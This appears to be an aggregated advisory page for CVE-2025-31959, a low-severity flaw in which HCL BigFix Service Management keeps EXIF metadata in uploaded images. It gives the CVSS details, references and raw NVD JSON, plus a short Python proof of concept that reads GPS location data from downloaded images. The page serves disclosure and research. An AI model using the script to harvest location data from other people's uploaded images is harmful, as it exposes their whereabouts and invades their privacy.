CVE-2025-31959

Description

HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared. .

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:* - VULNERABLE

HCL BigFix Service Management (SM) (具体受影响版本请参考官方公告KB0128144)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import PIL.Image
from PIL.ExifTags import TAGS, GPSTAGS

def get_exif_data(image_path):
    """
    Proof of Concept to extract EXIF data from an image.
    This simulates an attacker analyzing a downloaded image.
    """
    try:
        image = PIL.Image.open(image_path)
        # Verify if image has EXIF data
        exif_data = image._getexif()
        if exif_data is None:
            print("No EXIF metadata found.")
            return

        print(f"[+] Analyzing {image_path}...")
        for tag, value in exif_data.items():
            tag_name = TAGS.get(tag, tag)
            
            # Extract GPS Info specifically
            if tag_name == "GPSInfo":
                print(f"  [!] Found GPS Info:")
                for gps_tag in value:
                    gps_tag_name = GPSTAGS.get(gps_tag, gps_tag)
                    print(f"    {gps_tag_name}: {value[gps_tag]}")
            else:
                # Print other common tags (filtering binary data for display)
                if isinstance(value, (str, int, float, tuple)):
                    print(f"  {tag_name}: {value}")

    except Exception as e:
        print(f"Error: {e}")

# Example usage:
# get_exif_data("vulnerable_image.jpg")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-31959
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-31959
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-31959/
[4] VulDB https://vuldb.com/cve/CVE-2025-31959
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-31959", "sourceIdentifier": "[email protected]", "published": "2026-05-06T15:16:05.870", "lastModified": "2026-05-07T16:35:04.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared. ."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1230"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D915AC1-7C2B-497D-9A77-9726954B2282"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}